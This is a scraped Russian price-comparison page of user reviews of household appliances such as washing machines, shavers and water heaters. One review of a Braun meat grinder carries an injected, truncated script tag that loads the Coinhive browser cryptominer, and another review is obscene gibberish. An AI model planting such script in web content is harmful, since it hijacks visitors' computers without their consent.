Omar.ru  — лучшие цены в интернете  
Например: Кондиционеры, Телевизоры
Москва
Москва

Выбор региона

Если вы хотите посмотреть предложения магазинов из других регионов воспользуйтесь формой ниже.
Введите регион:
- -
Omar.ruГлавная » Отзывы

Отзывы владельцев техники

Разделы
    Все
    Илларионов Ярослав, 14 июня 2018 г.

    Отзыв о музыкальном центре Mystery MMK-555 U черный

    оценка

    1
    Срок использования: 2 года
    Количество поломок: была 2 поломки
    ДОСТОИНСТВА
    хуйня арьаобаробролб
     
    НЕДОСТАТКИ
    хуйняорбопбпроьюбопилоюполю
    МОЁ МНЕНИЕ: хуйняобаробрплю тьмробплобпомл
    МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
    Монитор Dell u2412m black ips ..
    Цена: 17 990 руб.
    RBT.ru Омск
    Монитор Dell U2412M White
    Цена: 16 970 руб.
    techport.ru
    Монитор Dell u2412m black ips ..
    Цена: 17 990 руб.
    RBT.ru Ноябрьск
    Монитор Dell u2412m ..
    Цена: 17 990 руб.
    RBT.ru Ноябрьск
    Монитор Dell u2412m black ips ..
    Цена: 17 990 руб.
    RBT.ru Ноябрьск
    Dell Dell U2412M, White ..
    Цена: 17 480 руб.
    Ozon (Электроника)
    Игорь, 08 июня 2018 г.

    Отзыв о утюге Domotec MS 4925

    оценка

    3
    Модель: Domotec MS 4925
    Срок использования: менее года
    Количество поломок: была 2 поломки
    ДОСТОИНСТВА
     
    НЕДОСТАТКИ
    нет схемы электронного блока
    МОЁ МНЕНИЕ: не надёжный
    МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
    Антонина, 30 мая 2018 г.

    Отзыв о мясорубке Moulinex HV3 (А15)

    оценка

    10
    Модель: Moulinex HV3 (А15)
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    При этой мощности- очень хороший агрегат.
     
    НЕДОСТАТКИ
    Я её так люблю, что минусов не вижу.
    МОЁ МНЕНИЕ: Мясорубка HV3 (Франция) у нас с 1996года. Один раз поменяла нож, но зря, т.к. из дорогого и дешёвого ножей купила дешевый, который никакой, можно было и старый оставить. Пользуюсь мясорубкой постоянно: и мясо смолоть(филе курицы и рыбу на ура, а после мяса Подробнее
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Алексей., 28 мая 2018 г.

    Отзыв о водонагревателе Isea S 30-150

    оценка

    10
    Модель: Isea S 30-150
    Срок использования: больше 5 лет
    Количество поломок: была 1 поломка
    ДОСТОИНСТВА
    Компактный. Не шумит. Прост в управлении. Минимум электроники. Анода хватило на 5 лет.
     
    НЕДОСТАТКИ
    Не нашёл пластиковых патрубков. Когда откручивал на холодной воде, сломал. Пришлось заменить на медный.
    МОЁ МНЕНИЕ: Покупал isea ys 60 re в 2011. Использовали только в летнее время, с 20 мая по 20 сентября (обычно). Осенью 2017 начал срабатывать УЗО. Разобрал, от анода ничего не осталось. Заменил. ТЭН почистил, сутки отмокал в ведре с водой и лимонной кислотой. Бак промыл. Подробнее
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Александр, 28 мая 2018 г.

    Отзыв о фильтре для очистки воды Изумруд

    оценка

    1
    Модель: Изумруд
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    всего 700р за чистку. В год!!!!
     
    НЕДОСТАТКИ
    Душа не верит в прибор. Разум тоже!
    МОЁ МНЕНИЕ: Ребята! Вы еще верите в сказки. Если верите-бегом в магазин. Чудес не бывает.Особенно в сфере торговли.Камни во внутренних органах на месте. Гипертония и кишечные колики процветают. Грязь на дне стакана имеет место быть. Если вы сьедаете камешки и песочек Подробнее
    МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
    НГОСЯ, 15 мая 2018 г.

    Отзыв о воздухоочистителе Аэролайф

    оценка

    9
    Модель: Аэролайф
    Срок использования: менее года
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    При почти непрерывной работе в течении 3-х месяцев отмечено,что дети стали болеть гораздо меньше.Но пыль как была так и Подробнее
     
    НЕДОСТАТКИ
    Гудит ночью даже в ночном режиме и сильно холодит зимой
    МОЁ МНЕНИЕ: С-80
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Сергей, 02 мая 2018 г.

    Отзыв о водонагревателе Успех 200л

    оценка

    8
    Модель: Успех 200л
    Срок использования: больше 5 лет
    Количество поломок: была 2 поломки
    ДОСТОИНСТВА
    Очень удобен
     
    НЕДОСТАТКИ
    Плохой доступ для замены тена и после 10 лет начинает течь по швам
    МОЁ МНЕНИЕ: Хочу заменить на новый меня устраивает
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Татьяна, 27 апреля 2018 г.

    Отзыв о электробритве Philips YS534

    оценка

    1
    Модель: Philips YS534
    Срок использования: 3 года
    Количество поломок: была 1 поломка
    ДОСТОИНСТВА
    много насадок
     
    НЕДОСТАТКИ
    низкое качество
    МОЁ МНЕНИЕ: Техника Philips является ОДНОРАЗОВОЙ, РАБОТАЕТ ТОЛЬКО В РАМКАХ ГАРАНТИИ И РЕМОНТУ НЕ ПОДЛЕЖИТ! Купили ровно 3 года назад аккумуляторную бритву Philips YS534/17. Аккумулятор вышел из строя и, как оказалось, замене не подлежит "по соображениям Подробнее
    МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
    Игорь, 15 апреля 2018 г.

    Отзыв о сетевой плате CNet P Pro-200

    оценка

    10
    Модель: CNet P Pro-200
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    Работает как с новыми, так и со старыми компами
     
    НЕДОСТАТКИ
    МОЁ МНЕНИЕ: надёжная
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Елена, 06 апреля 2018 г.

    Отзыв о стиральной машине Korting KWA 50085 R

    оценка

    10
    Модель: Korting KWA 50085 R
    Срок использования: менее года
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    Одни плюсы
     
    НЕДОСТАТКИ
    нет
    МОЁ МНЕНИЕ: Долго решалась на столь недешевую стиральную машинку, но с учетом того, что она стирает да еще и сушит белье, то вопрос отпал сам собой. Загрузка позволяет стирать объемные вещи, такие как пледы. одеяла, подушки и много другое. Я ее вообще не жалею, стираю Подробнее
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Дмитрий, 03 апреля 2018 г.

    Отзыв о микроволновой печи Polar W707M-17

    оценка

    10
    Модель: Polar W707M-17
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
     
    НЕДОСТАТКИ
    МОЁ МНЕНИЕ: Отличная сборка. Ничего не ломалось, работает до сих пор. Со своей задачей (разогрев и разморозка) справляется без проблем. Решил написать отзыв так как продал ее на вторичном рынке. Обычная безпроблемная микроволновка. Сказать даже нечего...)))
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Юрий, 30 марта 2018 г.

    Отзыв о телевизоре Akai 32PDP-501P

    оценка

    8
    Модель: Akai 32PDP-501P
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    большой экран,качество,входов много,хорошая теплоотдача
     
    НЕДОСТАТКИ
    немного бликует на солнце,фирма акаи(серебристая) на телевизоре отвлекала на фоне черного экрана-заретушировал,на Подробнее
    МОЁ МНЕНИЕ: без проблемный
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Вера, 27 марта 2018 г.

    Отзыв о стиральной машине Zanussi FLS 872 C

    оценка

    10
    Модель: Zanussi FLS 872 C
    Срок использования: больше 5 лет
    Количество поломок: была 1 поломка
    ДОСТОИНСТВА
     
    НЕДОСТАТКИ
    МОЁ МНЕНИЕ: В эксплуатации 17 лет,8 лет назад замена двигателя,до сих пор работает.
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Евгений, 25 марта 2018 г.

    Отзыв о стиральной машине Zanussi WD 1601

    оценка

    10
    Модель: Zanussi WD 1601
    Срок использования: больше 5 лет
    Количество поломок: было 4 поломки
    ДОСТОИНСТВА
    Шикарная машина за умеренные деньги
     
    НЕДОСТАТКИ
    Отсутствуют индикаторы текущих этапов выполнения программы, отсутствует индикатор включения нагрева воды. Снята с Подробнее
    МОЁ МНЕНИЕ: По-настоящему "умная" машина, вплоть до того, что можно доложить забытую вещь в процессе стирки и если воды не много, дверцу можно будет открыть сразу же. Стирает идеально direct spray - супер! Дизайн очень оригинальный- не надо сгибаться в три Подробнее
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Анатолий, 06 марта 2018 г.

    Отзыв о мониторе BenQ FP767-12

    оценка

    10
    Модель: BenQ FP767-12
    Срок использования: больше 5 лет
    Количество поломок: была 2 поломки
    ДОСТОИНСТВА
    вечный монитор
     
    НЕДОСТАТКИ
    не нашел
    МОЁ МНЕНИЕ: Отличный безотказный монитор. Эксплуатирую его уже больше 20 лет (среднее время работы - 1 час в сутки) за это время было всего 2 поломки инверторов экрана.
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Дина, 05 марта 2018 г.

    Отзыв о швейной машинке Jaguar 6434

    оценка

    10
    Модель: Jaguar 6434
    Срок использования: менее года
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    нить не рвет, строчки ровные
     
    НЕДОСТАТКИ
    нет
    МОЁ МНЕНИЕ: После старой бабушкиной швейной машинки моя новая Jaguar конечно просто космос. Меня сразу продавец предупредил, что лучше на ней плотные ткани не шить, а мне сразу надо было новые джинсы подшить мужу. Рискнула-прошила, всё отлично. Ни разу машинка не Подробнее
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Виктор, 03 марта 2018 г.

    Отзыв о стиральной машине Ardo TL 800 EX

    оценка

    10
    Модель: Ardo TL 800 EX
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    Компактность, нет лишних примочек, проста в эксплуатации.
     
    НЕДОСТАТКИ
    За 9 лет эксплуатации, пока, нет.
    МОЁ МНЕНИЕ: Машинку эксплуатируем 9лет. Никаких проблем не возникало. Трудяга. Необходимо только не забывать элементарные рекомендации по уходу.
    МОЙ СОВЕТ: Я рекомендую эту модель.
    Владимир, 27 февраля 2018 г.

    Отзыв о электробритве Panasonic ES 8017

    оценка

    10
    Модель: Panasonic ES 8017
    Срок использования: менее года
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    Все!!!
     
    НЕДОСТАТКИ
    Ну, разве что, немного занудливый звук(как комар, когда спишь).
    МОЁ МНЕНИЕ: Досталась от родственника, лежала 2 года без использования. Думал аккумуляторы сдохли, но зарядка пошла сразу и все заработало. Правда одной зарядки хватает на 5 раз(по 5 минут). Пишут, что не годится для влажного бритья, а я - бреюсь!!! Не под душем, конечно, Подробнее
    МОЙ СОВЕТ: Я рекомендую эту модель.
    UPFOX, 22 февраля 2018 г.

    Отзыв о мясорубке Braun G 1300 K

    оценка

    9
    Модель: Braun G 1300 K
    Срок использования: больше года
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    <script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new Подробнее
     
    НЕДОСТАТКИ
    <script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new Подробнее
    МОЁ МНЕНИЕ: sdg h
    МОЙ СОВЕТ: Я рекомендую эту модель.
    СЕРГЕЙ НЕФЁДОВ, 18 февраля 2018 г.

    Отзыв о электробритве Харьков 6103М

    оценка

    9
    Модель: Харьков 6103М
    Срок использования: больше 5 лет
    Количество поломок: поломок не было
    ДОСТОИНСТВА
    ПРОСТАЯ И НАДЁЖНАЯ МАШИНКА !!!!!
     
    НЕДОСТАТКИ
    НЕ ВИЖУ....
    МОЁ МНЕНИЕ: ОТЛИЧНЫЙ ПРОСТОЙ АППАРАТ ЭКСПЛУАТИРУЮ БОЛЕЕ 15 ЛЕТ В НАСТОЯЩЕЕ ВРЕМЯ ПОЯВИЛСЯ ШУМ ПРИ СТРИЖКЕ.... НАДО СМАЗАТЬ НО ПОТЕРЯЛ СХЕМУ СМАЗКИ .... БЛАГОДАРЮ СПЕЦИАЛИСТОВ ЗАВОДА В ГОР ХАРЬКОВЕ !!!!!!!
    МОЙ СОВЕТ: Я рекомендую эту модель.